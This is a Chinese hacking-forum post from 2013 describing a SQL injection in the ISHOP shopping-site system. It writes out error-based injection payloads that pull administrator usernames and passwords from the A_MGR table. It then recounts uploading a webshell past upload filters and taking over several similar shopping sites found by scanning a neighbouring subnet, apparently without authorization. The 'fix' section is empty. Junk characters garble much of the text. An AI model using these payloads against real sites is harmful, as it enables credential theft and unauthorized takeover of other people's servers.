中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点
0 n$ }0 \5 H; R! vhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
& e/ \$ y& o, N1 v5 Y# ^* j# ^* F7 o4 y. h! {4 e3 a" m
习惯性的加’having1=1--
/ ~# m1 s/ F8 P& S, X4 W; B7 ?9 f! y3 V2 D
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—1 _% O2 l( W6 v& ~0 M. H
& i0 g  I: Q; t( X" ^% R
0" \+ \" t' [/ w# t

7 T- ^+ f" _. b) C爆出Diary_A.dl_Title(这时候很激动啊)& q9 X1 c9 w/ ~0 e

; _0 H; m) h" m  Q* o9 C那么继续
6 R/ t5 E9 _1 ^1 o4 {http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—. |  x/ B- G- q

: v# l3 J, G: f: \, K继续,一直爆下去
8 m1 I5 O& Z5 ?# S0 f! a" H
0 B, R. N; `  z4 j0 G7 u! X爆到几个字段和表段 但是没找到需要的管理用户的字段' B2 o0 p8 {' L0 ~  j# Q! x
# G  \7 N1 \7 N
蛋疼了 怎么办 然后去后台登陆页看源码( S8 b( J, o" s
1 r- E% g3 Y, w% p. @: h
0
) v. b& i+ E+ y6 M. F  C/ l# Y+ R) b: c: j$ k, g
Input name= “ADUID”
/ q+ Y3 q. H; v& a- z! z: |Input name= “ADPWD”
( C+ R/ Q4 L- L+ J! z5 J# J
& n6 X+ B4 c$ L8 {. N2 F$ D7 d0 Q) x很幸运 找到了字段那就继续8 s' Z7 S$ w. x1 E0 m
找到之后开始爆用户+ G. O% g! R. e4 M
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
8 {  N+ m: ~; ^爆密码
. D( _  x3 [$ |; u3 Ehttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
$ D% g& m, r+ H' _4 u7 G5 b& L测试了下 这个注入点只能爆到文章哪里的表
! _4 z' ?6 X# Y' e" ^: m
' f3 Q: U! f& v- ^) r/ L' A/ g头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
( d8 l5 M1 B' j* X$ I$ e/ O' e) a2 C! j, @$ W# H: y
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
3 d3 R% s, f- [2 z. s. U' w/ A' V2 D7 x& ?- B( p3 z. v' f6 R
473
5 ^( k  J+ M7 d: P7 ^3 @* c7 E( j
- q+ m' h4 w, `7 q- g, U' H进后台
6 J7 A6 l! I* K& M& \4 [5 f$ w+ K5 Q* i1 T* k$ ~1 j

; i& I; Y4 W4 l0 S发现几个上传点 有的地方不能上传 而且防止恶意代码
" o. I) d# `0 |& f5 e4 M
+ x& p2 P4 V% b9 E+ Q没办法 各种百度各种找大牛 找到一只好像可以突破的马
$ [+ i+ h  c0 d- M' }  E/ e; C# F- ]
8 x; v: O8 w' S) O6 g, t! J
在系统管理那里直接上传 不过没有显示地址) N2 A" W& r7 |3 @6 J
/ s& G- R* g8 G* m5 F! t
再上传一次 抓包 搞定OK
6 ]" O! l2 v( n9 x8 D3 s1 d2 s- d8 X0 H* Q
; T0 g6 a  X. ]. t( f; t( ]; z) L

4 v; [& v2 Y& i; p472
7 G7 C. R3 k/ b5 |8 U2 v) l9 I8 q- i% O
晚上不行了 去睡觉。。。% \; A3 V* j/ h0 j( `9 o
第二天刚起床 闲的没事做继续日站吧 8 ?2 D5 I1 O+ D1 p

' e8 L7 i7 o. w: h. M找个站 就把这个站的旁c扫了下: N# [# `5 v9 p+ Q

& d$ Q5 F+ q' `/ t' H发现c段也有一个购物站 ,然后还和这个站的模板差不多' G, X+ Q6 L3 ?0 d  G0 H- K) `& J

" `4 d: ]6 v4 T5 W, Y0 R0 p( g就找到会员登录口测试- i, h6 w- U0 ]% ~+ Z5 ?% l
8 ^# |( R7 m# h- h
'and (select top 1 MGR_UID from A_MGR)>0—
# ]% L3 n  c7 s1 O" k; z果断爆到了 这时候我很激动 通杀
3 i- w* Z9 }" z2 B* S3 Z  `3 R9 F- @
! o2 l1 i. O0 Z$ ]* f0 M再次翻c段
' L5 [7 A# v6 \2 S! Y3 K  M% H: u: T$ y- K
翻出几个站 都成功拿下
  B% \* t) |( F1 L% p- \/ D6 Y( x
% g) l& H+ J- Z  ^! y. i4 |; s- T/ |0 C
5 W+ B9 |( O1 R% U; G! {# k
修复方案:
& Z$ W$ p2 V& `+ e' F! J8 q. c: E. r他们比我专业 0 b7 ^+ ?9 Y6 w3 }. s
& g$ H2 J* V& Z% @) {: d5 `

8 b/ e9 w6 l& x. J" Z6 T7 ]  s$ V1 x
5 Y" g. h# [) A; e; H



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2